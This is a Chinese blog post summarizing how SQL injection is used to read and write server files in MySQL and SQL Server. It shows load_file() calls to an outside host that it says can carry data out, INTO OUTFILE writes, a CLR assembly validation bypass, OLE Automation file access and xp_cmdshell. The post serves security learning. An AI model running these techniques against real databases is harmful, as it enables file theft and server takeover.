.bcp文件解析为mysql_分析SQL注入中的文件读写总结

最新推荐文章于 2022-07-22 14:40:56 发布
最新推荐文章于 2022-07-22 14:40:56 发布
阅读量332 收藏
点赞数
文章标签: .bcp文件解析为mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42398141/article/details/113888927
版权
本文介绍了SQL注入中针对文件读写的攻击手法,包括MySQL的load_file()函数读写文件,SQL Server的BULK INSERT、CLR集成及Script.FileSystemObject进行文件操作,以及Oracle的相关限制。详细分析了各种数据库系统下的文件读写方法和技术。
摘要由CSDN通过智能技术生成

SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。

一、MySQL

读文件

常见的读文件,可以用16进制代替字符串

select load_file('c:/boot.ini')

select load_file(0x633a2f626f6f742e696e69)

select load_file('//ecma.io/1.txt')       # smb协议

select load_file('\\\\ecma.io\\1.txt')    # 可用于DNS隧道

写文件

我暂时已知l两种写文件的方式

select 0x313233 into outfile 'D:/1.txt'

select 0x313233 into dumpfile 'D:/1.txt'

二、 SQL Server

读文件

1. BULK INSERT

create table result(res varchar(8000));

bulk insert result from 'd:/1.txt';

2. CLR集成

// 开启CLR集成

exec sp_configure 'show advanced options',1;

reconfigure;

exec sp_configure 'clr enabled',1

reconfigure

create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。

create assembly sqb from 'd:\net.exe';

alter assembly sqb add file from 'd:\1.txt'

alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

# 开启Ole Automation Procedures

sp_configure 'show advanced options',1;

RECONFIGURE;

sp_configure 'Ole Automation Procedures',1;

RECONFIGURE;

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate 'scripting.filesystemobject',@o out

exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1

exec @ret = sp_onmethod @f, 'readline', @line out

while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

写文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret int

declare @line varchar(8000)

exec sp_oacreate 'scripting.filesystemobject',@o out

exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1

exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP复制文件(测试失败,无bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

三、Oracle

pass,Oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论

植观的TT
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BCP详解
出来混,迟早要还的。。。。。
12-23 3457
BCP是SQL Server负责导入导出数据的一个命令行工具,它是基于DB-Library的,并且能以并行的方式高效地导入导出大批量的数据。本文介绍如何利用BCP导入导出数据。 BCP是SQL Server负责导入导出数据的一个命令行工具,它是基于DB-Library的,并且能以并行的方式高效地导入导出大批量的数据。BCP可以将数据库的表或视图直接导出,也能通过SELECT FR
bcp命令详解
felixfeng的专栏
03-04 2118
<br />参数<br />database_name<br /><br />指定的表或视图所在数据库的名称。如果未指定,则为用户默认数据库。<br /><br />owner<br /><br />表或视图所有者的名称。如果执行大容量复制操作的用户拥有指定的表或视图,则owner是可选的。如果没有指定owner并且执行大容量复制操作的用户不拥有指定的表或视图,则Microsoft? SQL Server? 2000将返回错误信息并取消大容量复制操作。<br /><br />table_name<br />
.bcp文件解析mysql_sql server三种导入导出数据方式(SQL语句、bcp、dts)
weixin_33534616的博客
03-05 404
当我们建立一个数据库时,并且想将分散在各处的不同类型的数据库分类汇总在这个新建的数据库时,尤其是在进行数据检验、净化和转换时,将会面临很大的挑战。幸好sql server为我们提供了强大、丰富的数据导入导出功能,并且在导入导出的同时可以对数据进行灵活的处理。在sql server主要有三种方式导入导出数据:使用Transact-SQL对数据进行处理;调用命令行工具BCP处理数据;使用数据转换服...
SQLserver利用bcp导入导出大容量数据-SQL脚本
weixin_40412301的博客
07-22 1361
SQLserver利用bcp大容量导入导出
bcp计算机,BCP 文件扩展名: 它是什么以及如何打开它?
weixin_33610824的博客
07-26 1885
BCP 问题的来源 打开 BCP 文件过程所遇到的常见问题缺少 Adobe Photoshop双击你的 BCP 文件会提示消息 “%%os%% 无法打开 BCP 文件”。 如果是这样,这通常意味着你没有为 %%os%% 安装 Adobe Photoshop。 您的操作系统无法将 BCP 与 Adobe Photoshop 关联,因此双击该文件将无法正常工作。 提示: 如果您知道另一个可以打开您...
bcp.rar_BCP_bcp sq_bcp sql_site:www.pudn.com_sql bcp
09-23
BCP命令通常在命令行环境运行,它允许用户将数据从一个数据源(如文本文件)导入到SQL Server数据库,或者将数据从数据库导出到文件。基本语法如下: ``` bcp {database_name.schema.table | database_name.....
SQL-IMP-EXP.rar_BCP_EXP SQL_SQL imp_imp导入sql文件_out
09-24
SQL语句导入导出大全 /** 导入文本文件 EXEC master..xp_cmdshell bcp dbname..tablename in c:\DT.txt -c -Sservername -Usa -Ppassword /** 导出文本文件 EXEC master..xp_cmdshell bcp dbname..tablename out ...
关于SQL注入文件读写的方法总结
09-09
本文主要探讨了在SQL注入攻击如何进行文件的读写操作。SQL注入是一种常见的网络安全攻击技术,攻击者通过向数据库注入恶意SQL代码,从而控制数据库服务器。在这一过程,攻击者不仅能够读取数据库的数据,还能...
MySQL导入导出.sql文件及常用命令小结
12-15
MySQL Qurey Brower直接导入*.sql脚本,是不能一次执行多条sql命令的,在mysql执行sql文件的命令: mysql> source c:\\test.sql; 另附mysql常用命令: (一) 连接MYSQL: 格式: mysql -h主机地址 -u用户名 -p...
bcp命令详解+实例
09-12
详细描述了bcp命令的使用. 包括怎么从数据库bcp文件, 怎么把文件bcp in到数据库
sql.rar_SQL_Server_SQL_
08-11
在本文,我们将深入探讨SQL Server的SQL语言基础及其应用。 SQL Server是微软公司开发的一款强大的关系数据库管理系统(RDBMS),它提供了高效的数据存储、检索和管理功能。SQL Server支持标准的SQL语法,同时...
数据库存储与读取文件
zjcxc(邹建)的Blog - SQL Server
12-29 7399
if exists (select * from dbo.sysobjects where id = object_id(N[dbo].[p_binaryIO]) and OBJECTPROPERTY(id, NIsProcedure) = 1)drop procedure [dbo].[p_binaryIO]GO/*--bcp 实现二进制文件的导入导出 支持image,text,ntex
.bcp文件解析mysql_使用BCP导出导入数据
weixin_39915078的博客
01-21 701
bcp 实用工具可以在 Microsoft SQL Server 实例和用户指定格式的数据文件间大容量复制数据。 使用 bcp 实用工具可以将大量新行导入 SQL Server 表,或将表数据导出到数据文件。 除非与 queryout 选项一起使用,否则使用该实用工具不需要了解 Transact-SQL 知识。 若要将数据导入表,必须使用为该表创建的格式文件,或者必须了解表的结构以及对于该表的...
java读取bcp文件_Java实现获取指定路径下的指定格式的文件,如bcp,txt等
weixin_29156401的博客
02-16 856
在使用java的过程,通常会用到一些小的知识点,如搜索特定格式的文件等等,实现的方式有多种,找一种顺手的就可以了。搜索特定文件的本地还是使用endWith()函数。以前写c/c++的时候没有发现这么好用的函数。哈哈package filenameFilter;import java.io.File;/** 实现功能:* 获取指定路径下的指定格式的文件;* */public class ...
.bcp文件解析mysql_c#使用BCP命令将数据从数据库导出
weixin_32033241的博客
01-26 235
以sqlserver为例,将sqlserver的数据导入到excelSqlConnection conn=new SqlConnection("server=localhost;uid=sa;pwd=sqlserver;database=test");//连接数据库//其"test"为数据库名,"excel"为表名,严格表名,即使用:数据库名.dbo.表名string genExcelCom...
java 导出bcp文件格式_Java项目调用bat批处理配合使用BCP进行多用户数据的备份...
weixin_34119722的博客
02-16 705
标签:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处、作者信息和本声明。否则将追究法律责任。http://enetq.blog.51cto.com/479739/878372Java项目调用bat批处理配合使用BCP进行多用户数据的备份一、项目需求最近项目需要对数据库(Sql Server系列数据库)进行备份。项目的需求不是简单的整个数据库的备份,而是根据用户来备份,具体的...
python 文件读取处理问题记载
qq_32446743的博客
02-28 223
如果有的文件有\xef\xbc导致utf-8不能解析,可以这样做 with open('sss.bcp','r',encoding='utf-8') as f: while True: try: data = f.readline() if data: print(data) ...
如何将MySQL的.sql文件给sql server
最新发布
07-11
使用命令行工具(如bcp或sqlcmd):在命令行执行适当的命令,使用bcp或sqlcmd工具将纯文本文件导入到SQL Server数据库。这些工具提供了灵活的选项,可以根据需要进行配置。 4. 验证数据导入。在导入完成后,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值